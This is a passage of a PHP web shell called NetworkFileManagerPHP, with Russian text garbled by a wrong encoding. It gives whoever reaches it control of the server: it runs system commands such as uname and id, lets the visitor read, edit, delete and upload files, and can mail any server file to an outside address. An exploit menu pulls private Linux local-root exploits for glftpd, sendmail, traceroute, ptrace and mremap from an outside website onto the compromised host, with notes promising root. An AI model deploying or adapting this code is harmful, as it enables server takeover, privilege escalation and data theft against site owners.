Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
|
|
";
|
|
$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK
|
|
$title_exp[2] = "
|
|
lGlftpd DupeScan Local Exploit - ïðèâàòíûé ñïëîéò, äàþùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ãäå çàïóùåí ñåðâèñ Glftpd <br>
|
|
<dd>Èìååòñÿ 2 ôàéëà: <b>dupescan</b> è <b>glftpd</b> Äëÿ ïîëó÷åíèÿ root ïðàâ, íåîáõîäèìî çàïèñàòü ôàéë dupescan â äåðèêòîðèþ<br>
|
|
/glftpd/bin/ êîìàíäîé <u>cp dupescan /glftpd/bin/</u>, ïîñëå ÷åãî èç bash øåëà çàïóñòèòü <u>./glftpd</u>. Ðóò âàì îáåñïå÷åí!!!<br>
|
|
Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
|
|
";
|
|
$private[3] = "glftpd";
|
|
$title_exp[3] = "
|
|
lGlftpd DupeScan Local Exploit - ïðèâàòíûé ñïëîéò, äàþùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ãäå çàïóùåí ñåðâèñ Glftpd <br>
|
|
Âòîðàÿ ÷àñòü ýêñïëîéòà<br>
|
|
Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
|
|
";
|
|
$private[4] = "sortrace";
|
|
$title_exp[4] = "
|
|
Traceroute v1.4a5 exploit by sorbo - ïðèâàòíûé ñïëîéò, äàþùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ÷åðåç ñåðâèñ traceroute<br>
|
|
<dd><b>Çàïóñê:</b> ./sortrace<br>
|
|
Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
|
|
";
|
|
$private[5] = "root";
|
|
$title_exp[5] = "
|
|
localroot root linux 2.4.* - ïðèâàòíûé ñïëîéò, äàþùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ðàáîòàåò òàêæå êàê è ìðåìàï<br>
|
|
<dd><b>Çàïóñê:</b> ./root<br>
|
|
Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
|
|
";
|
|
$private[6] = "sxp";
|
|
$title_exp[6] = "
|
|
Sendmail 8.11.x exploit localroot - ïðèâàòíûé ñïëîéò, äàþùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ðàáîòàåò òàêæå êàê è ìðåìàï<br>
|
|
<dd><b>Çàïóñê:</b> ./sxp<br>
|
|
Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
|
|
";
|
|
$private[7] = "ptrace_kmod";
|
|
$title_exp[7] = "
|
|
localroot root linux 2.4.* - ïðèâàòíûé ñïëîéò, äàþùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ðàáîòàåò òàêæå êàê è ìðåìàï, èñïîëüçóåò áàãó ÷åðåç ptarce + kmod<br>
|
|
<dd><b>Çàïóñê:</b> ./ptrace_kmod<br>
|
|
Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
|
|
";
|
|
$private[8] = "mr1_a";
|
|
$title_exp[8] = "
|
|
localroot root linux 2.4.* - ïðèâàòíûé ñïëîéò, äàþùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ðàáîòàåò òàêæå êàê è ìðåìàï, ðàáîòàåò òàêæå êàê è ìðåìàï<br>
|
|
<dd><b>Çàïóñê:</b> ./mr1_a<br>
|
|
Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
|
|
";
|
|
/* çàäàåì ïóòü ê ñàéòó, ãäå ëåæàò ïðèâàòíûå ýêñïëîéòû */
|
|
$private_site = "http://hackru.info/adm/exploits/private_exploits/";
|
|
endif;
|
|
|
|
/* Äàëüøå íè÷åãî íå èçìåíÿòü âî èçáåæàíèè íåðàáîòîñïîñîáíîñòè ñêðèïòà */
|
|
global $action,$tm,$cm;
|
|
|
|
function getdir() {
|
|
global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
|
|
$st = getcwd();
|
|
$st = str_replace("\\","/",$st);
|
|
$j = 0;
|
|
$gdir = array();
|
|
$gsub = array();
|
|
print("<br>");
|
|
for ($i=0;$i<=(strlen($st)-1);$i++) {
|
|
if ($st[$i] != "/") {
|
|
$gdir[$j] = $gdir[$j].$st[$i];
|
|
$gsub[$j] = $gsub[$j].$st[$i];
|
|
} else {
|
|
$gdir[$j] = $gdir[$j]."/";
|
|
$gsub[$j] = $gsub[$j]."/";
|
|
$gdir[$j+1] = $gdir[$j];
|
|
$j++;
|
|
}
|
|
}
|
|
print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b> Òåêóùàÿ äèðåêòîðèÿ: </b>");
|
|
for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
|
|
$free = tinhbyte(diskfreespace("./"));
|
|
print("</td></tr><tr><td align=left><b> Äîñòóïíîå äèñêîâîå ïðîñòðàíñòâî</b> : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>");
|
|
print("<tr><td align=left><b> ".exec("uname -a")."</b></td></tr>");
|
|
print("<tr><td align=left><b> Âàø IP: </b><font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR $HTTP_X_FORWARDED_FOR</font></td></tr>");
|
|
print("<tr><td align=left><b> Èíôà î æåëåçå:(GHz)</b> ".exec("cat /proc/cpuinfo | grep GHz")."</td></tr>");
|
|
print("<tr><td align=left><b><b> Èíôà î æåëåçå:(MHz)</b> ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr>");
|
|
print("<tr><td align=left><b> ".exec("id")."</b></td></tr></table><br>");
|
|
|
|
}
|
|
|
|
function tinhbyte($filesize) {
|
|
if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
|
|
elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
|
|
elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
|
|
else { $filesize = $filesize . ""; }
|
|
return $filesize;
|
|
}
|
|
|
|
function permissions($mode) {
|
|
$perms = ($mode & 00400) ? "r" : "-";
|
|
$perms .= ($mode & 00200) ? "w" : "-";
|
|
$perms .= ($mode & 00100) ? "x" : "-";
|
|
$perms .= ($mode & 00040) ? "r" : "-";
|
|
$perms .= ($mode & 00020) ? "w" : "-";
|
|
$perms .= ($mode & 00010) ? "x" : "-";
|
|
$perms .= ($mode & 00004) ? "r" : "-";
|
|
$perms .= ($mode & 00002) ? "w" : "-";
|
|
$perms .= ($mode & 00001) ? "x" : "-";
|
|
return $perms;
|
|
|
|
|
|
}
|
|
|
|
function readdirdata($dir) {
|
|
global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;
|
|
$files = array();
|
|
$dirs= array();
|
|
$open = @opendir($dir);
|
|
|
|
if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert><b>Íåò äîñòóïà.</b></td></tr></table>";
|
|
else {
|
|
$open = opendir($dir);
|
|
while ($file = readdir($open)) {
|
|
$rec = $file;
|
|
$file = $dir."/".$file;
|
|
if (is_file($file)) $files[] = $rec;
|
|
}
|
|
sort($files);
|
|
$open = opendir($dir);
|
|
$i=0;
|
|
while ($dire = readdir($open)) {
|
|
if ( $dire != "." ) {
|
|
$rec = $dire;
|
|
$dire = $dir."/".$dire;
|
|
if (is_dir($dire)) {
|
|
$dirs[] = $rec;
|
|
$i++;
|
|
}
|
|
}
|
|
}
|
|
sort($dirs);
|
|
print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle><b>Èìÿ</b></td><td width = '10%' align = 'center' class=pagetitle><b>Ðàçìåð</b></td><td width = '20%' align = 'center' class=pagetitle><b>Äàòà ñîçäàíèÿ</b></td><td width = '10%' align = 'center' class=pagetitle><b>Òèï</b></td><td width = '15%' align = 'center' class=pagetitle><b>Ïðàâà äîñòóïà</b></td><td width = '25%' align = 'center' class=pagetitle><b>Êîììåíòàðèè</b></td></tr></table>");
|
|
for ($i=0;$i<sizeof($dirs);$i++) {
|
|
if ($dirs[$i] != "..") {
|
|
$type = 'Dir';
|
|
$fullpath = $dir."/".$dirs[$i];
|
|
$time = date("d/m/y H:i",filemtime($fullpath));
|
|
$perm = permissions(fileperms($fullpath));
|
|
$size = tinhbyte(filesize($fullpath));
|
|
$name = $dirs[$i];
|
|
$fullpath = $tm."/".$dirs[$i];
|
|
if ($perm[7] == "w" && $name != "..") $action = "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr>
|
|
<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Çàãðóçèòü</a></td>
|
|
<td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Óäàëèòü</a></td>
|
|
</tr>
|
|
<tr>
|
|
<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>Íîâàÿ äèðåêòîðèÿ</a></td>
|
|
<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Àðõèâàöèÿ ïàïêè</a></td>
|
|
</tr></table>";
|
|
else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>Òîëüêî ÷òåíèå</b></td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Àðõèâàöèÿ ïàïêè</a></td></tr></table>";
|
|
print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$name</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>");
|
|
}
|
|
}
|
|
for ($i=0;$i<sizeof($files);$i++) {
|
|
$type = 'File';
|
|
$fullpath = $dir."/".$files[$i];
|
|
$time = date("d/m/y H:i",filemtime($fullpath));
|
|
$perm = permissions(fileperms($fullpath));
|
|
$size = tinhbyte(filesize($fullpath));
|
|
$owner = @chown($fullpath, "nobody");
|
|
if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view'>Ïðîñìîòð</a></td>
|
|
<td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download'>Ñêà÷êà</a></td></tr>
|
|
<tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail'>Íà ìûëî</a></td>
|
|
<td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copyfile'>Êîïèðîâàòü</a></td>
|
|
</tr></table>";
|
|
if ( $owner == "nobody" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit'>Ðåäàêòèðîâàòü</a></td>
|
|
<td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete'>Óäàëèòü</a></td>
|
|
</tr></table>";
|
|
print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>");
|
|
}
|
|
}
|
|
}
|
|
|
|
function html() {
|
|
global $ver,$meta,$style;
|
|
echo "
|
|
<html>
|
|
<head>
|
|
<title>NetworkFileManagerPHP</title>
|
|
</head>
|
|
<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
|
|
";
|
|
}
|
|
|
|
# ïðîñìîòð ôàéëà
|
|
function viewfile($dir,$file) {
|
|
|
|
$buf = explode(".", $file);
|
|
$ext = $buf[sizeof($buf)-1];
|
|
$ext = strtolower($ext);
|
|
$dir = str_replace("\\","/",$dir);
|
|
$fullpath = $dir."/".$file;
|
|
|
|
switch ($ext) {
|
|
case "jpg":
|
|
|
|
header("Content-type: image/jpeg");
|
|
readfile($fullpath);
|
|
break;
|
|
case "jpeg":
|
|
|
|
header("Content-type: image/jpeg");
|
|
readfile($fullpath);
|
|
break;
|
|
case "gif":
|
|
|
|
header("Content-type: image/gif");
|
|
readfile($fullpath);
|
|
break;
|
|
|
|
case "png":
|
|
|
|
header("Content-type: image/png");
|
|
readfile($fullpath);
|
|
break;
|
|
default:
|
|
|
|
case "avi":
|
|
header("Content-type: video/avi");
|
|
readfile($fullpath);
|
|
|
|
break;
|
|
default:
|
|
|
|
case "mpeg":
|
|
header("Content-type: video/mpeg");
|
|
readfile($fullpath);
|
|
break;
|
|
default:
|
|
|
|
case "mpg":
|
|
header("Content-type: video/mpg");
|
|
readfile($fullpath);
|
|
break;
|
|
default:
|
|
|
|
html();
|
|
chdir($dir);
|
|
getdir();
|
|
|
|
echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Ïóòü äî Ôàéëà:</font><font color=white face ='Tahoma' size = 2>$fullpath</font></td></tr></table>";
|
|
$fp = fopen($fullpath , "r");
|
|
while (!feof($fp)) {
|
|
$char = fgetc($fp);
|
|
$st .= $char;
|
|
}
|
|
|
|
$st = str_replace("&", "&", $st);
|
|
$st = str_replace("<", "<", $st);
|
|
$st = str_replace(">", ">", $st);
|
|
|
|
$tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>";
|
|
echo $tem;
|
|
fclose($fp);
|
|
break;
|
|
}
|
|
}
|
|
|
|
# îòïðàâêà ôàéëà íà ìûëî
|
|
function download_mail($dir,$file) {
|
|
global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;
|
|
$buf = explode(".", $file);
|
|
$dir = str_replace("\\","/",$dir);
|
|
$fullpath = $dir."/".$file;
|
|
$size = tinhbyte(filesize($fullpath));
|
|
$fp = fopen($fullpath, "rb");
|
|
while(!feof($fp))
|
|
|
|
$attachment .= fread($fp, 4096);
|
|
$attachment = base64_encode($attachment);
|
|
$subject = "NetworkFileManagerPHP ($file)";
|
|
|
|
$boundary = uniqid("NextPart_");
|
|
$headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
|
|
|
|
$info = "---==== Ñîîáùåíèå îò ($demail)====---\n\n";
|
|
$info .= "IP:\t$REMOTE_ADDR\n";
|
|
$info .= "HOST:\t$HTTP_HOST\n";
|
|
$info .= "URL:\t$HTTP_REFERER\n";
|
|
$info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
|
|
$info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
|
|
|
|
$send_to = "$demail";
|
|
|
|
$send = mail($send_to, $subject, $info, $headers);
|
|
|
|
if($send == 2)
|
|
echo "<br>
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center>
|
|
<font color='#FFFFCC' face='Tahoma' size = 2>Ñïàñèáî!!!Ôàéë <b>$file</b> îòïðàâëåí âàì íà <u>$demail</u>.</font></center></td></tr></table><br>";
|
|
|
|
fclose($fp);
|
|
}
|
|
|
|
|
|
|
|
function copyfile($dir,$file) {
|
|
global $action,$tm;
|
|
$fullpath = $dir."/".$file;
|
|
echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Èìÿ ôàéëà :</font><font color = 'black' face ='Tahoma' size = 2> <b><u>$file</u></b> ñêîïèðîâàí â äåðèêòîðèþ <u><b>$dir</b></u></font></center></td></tr></table>";
|
|
if (!copy($file, $file.'.bak')){
|
|
echo (" íåìîãó ñêîïèðîâàòü ôàéë $file");
|
|
}
|
|
}
|
|
|
|
|
|
# ðåäàêòèðîâàíèå ôàéëà
|
|
function editfile($dir,$file) {
|
|
global $action,$datar;
|
|
$fullpath = $dir."/".$file;
|
|
chdir($dir);
|
|
getdir();
|
|
echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Èìÿ ôàéëà :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>";
|
|
$fp = fopen($fullpath , "r");
|
|
while (!feof($fp)) {
|
|
$char = fgetc($fp);
|
|
$st .= $char;
|
|
}
|
|
$st = str_replace("&", "&", $st);
|
|
$st = str_replace("<", "<", $st);
|
|
$st = str_replace(">", ">", $st);
|
|
$st = str_replace('"', """, $st);
|
|
echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='Ïîåõàëè' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>";
|
|
$datar = $S1;
|
|
|
|
}
|
|
|
|
# çàïèñü ôàéëà
|
|
function savefile($dir,$file) {
|
|
global $action,$S1,$tm;
|
|
$fullpath = $dir."/".$file;
|
|
$fp = fopen($fullpath, "w");
|
|
$S1 = stripslashes($S1);
|
|
fwrite($fp,$S1);
|
|
fclose($fp);
|
|
chdir($dir);
|
|
echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Ôàéë <b>$fullpath</b> îòðåäàêòèðîâàí.</font></td></tr></table>";
|
|
getdir();
|
|
readdirdata($tm);
|
|
}
|
|
|
|
# óäàëåíèå äåðèêòîðèè
|
|
function deletef($dir)
|
|
{
|
|
global $action,$tm,$fi;
|
|
$tm = str_replace("\\\\","/",$tm);
|
|
$link = $tm."/".$fi;
|
|
unlink($link);
|
|
chdir($tm);
|
|
getdir();
|
|
readdirdata($tm);
|
|
}
|
|
|
|
# çàãðóçêà ôàéëà
|
|
function uploadtem() {
|
|
global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
|
|
echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>Çàãðóçêà ôàéëà:</b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr></form></table>";
|
|
}
|
|
|
|
function upload() {
|
|
global $HTTP_POST_FILES,$tm;
|
|
echo $set;
|
|
copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Íå ìîãó çàãðóçèòü ôàéë".$HTTP_POST_FILES["userfile"][name]);
|
|
echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Ôàéë <b>".$HTTP_POST_FILES["userfile"][name]."</b> óñïåøíî çàãðóæåí.</font></center></td></tr></table>";
|
|
@unlink($userfile);
|
|
chdir($tm);
|
|
getdir();
|
|
readdirdata($tm);
|
|
}
|
|
|
|
# çàêà÷êà ýêñïëîéòîâ
|
|
function upload_exploits() {
|
|
global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp;
|
|
|
|
echo "<br>
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
|
|
<tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
|
|
<b>Ïóáëè÷íûå ýêñïëîéòû:</b></td></tr>
|
|
<tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
|
|
<b>BASH øåë</b> - bindtty.c (ôàéë çàïóñêà <u>s</u>)</td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=500> $title_ex[1]</td>
|
|
<td width=100><input type='hidden' name='file3' value='$public_site$public[1]'>
|
|
<input type='hidden' name='file2' value='$public[1]'>
|
|
<input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
|
|
</form></table>";
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
|
|
<tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
|
|
<b>Local ROOT for linux 2.6.20</b> - mremap (ôàéë çàïóñêà <u>m</u>)</td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=500> $title_ex[2]</td>
|
|
<td width=100><input type='hidden' name='file3' value='$public_site$public[2]'>
|
|
<input type='hidden' name='file2' value='$public[2]'>
|
|
<input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
|
|
</form></table>";
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
|
|
<tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
|
|
<b>Local ROOT for linux 2.6.20</b> - ptrace (ôàéë çàïóñêà <u>p</u>)</td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=500> $title_ex[3]</td>
|
|
<td width=100><input type='hidden' name='file3' value='$public_site$public[3]'>
|
|
<input type='hidden' name='file2' value='$public[3]'>
|
|
<input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
|
|
</form></table>";
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
|
|
<tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
|
|
<b>psyBNC âåðñèÿ:2.3.2-4</b> - psyBNC (ôàéë çàïóñêà <u>./psybnc</u>)</td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=500> $title_ex[4]</td>
|
|
<td width=100><input type='hidden' name='file3' value='$public_site$public[4]'>
|
|
<input type='hidden' name='file2' value='$public[4]'>
|
|
<input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
|
|
</form></table>";
|
|
|
|
echo "<br>
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
|
|
<tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
|
|
<b>Ïðèâàòíûå ýêñïëîéòû:</b></td></tr>
|
|
<tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
|
|
<b>BRK</b> - Local Root Unix 2.4.*(ôàéë çàïóñêà <u>brk</u>)</td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=500> $title_exp[1]</td>
|
|
<td width=100><input type='hidden' name='file3' value='$private_site$private[1]'>
|
|
<input type='hidden' name='file2' value='$private[1]'>
|
|
<input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
|
|
</form></table>";
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
|
|
<tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
|
|
<b>Glftpd DupeScan Local Exploit <u>Ôàéë 1</u></b> (ôàéë çàïóñêà <u>$private[2]</u> )</td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=500> $title_exp[2]</td>
|
|
<td width=100><input type='hidden' name='file3' value='$private_site$private[2]'>
|
|
<input type='hidden' name='file2' value='$private[2]'>
|
|
<input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
|
|
</form></table>";
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
|
|
<tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
|
|
<b>Glftpd DupeScan Local Exploit <u>Ôàéë 2</u></b> (ôàéë çàïóñêà <u>$private[3]</u> )</td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=500> $title_exp[3]</td>
|
|
<td width=100><input type='hidden' name='file3' value='$private_site$private[3]'>
|
|
<input type='hidden' name='file2' value='$private[3]'>
|
|
<input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
|
|
</form></table>";
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
|
|
<tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
|
|
<b>Traceroute v1.4a5 exploit by sorbo</b> (ôàéë çàïóñêà <u>$private[4]</u> )</td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=500> $title_exp[4]</td>
|
|
<td width=100><input type='hidden' name='file3' value='$private_site$private[4]'>
|
|
<input type='hidden' name='file2' value='$private[4]'>
|
|
<input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
|
|
</form></table>";
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
|
|
<tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
|
|
<b>Local Root Unix 2.4.*</b> (ôàéë çàïóñêà <u>$private[5]</u> )</td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=500> $title_exp[5]</td>
|
|
<td width=100><input type='hidden' name='file3' value='$private_site$private[5]'>
|
|
<input type='hidden' name='file2' value='$private[5]'>
|
|
<input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
|
|
</form></table>";
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
|
|
<tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
|
|
<b>Sendmail 8.11.x exploit localroot</b> (ôàéë çàïóñêà <u>$private[6]</u> )</td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=500> $title_exp[6]</td>
|
|
<td width=100><input type='hidden' name='file3' value='$private_site$private[6]'>
|
|
<input type='hidden' name='file2' value='$private[6]'>
|
|
<input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
|
|
</form></table>";
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
|
|
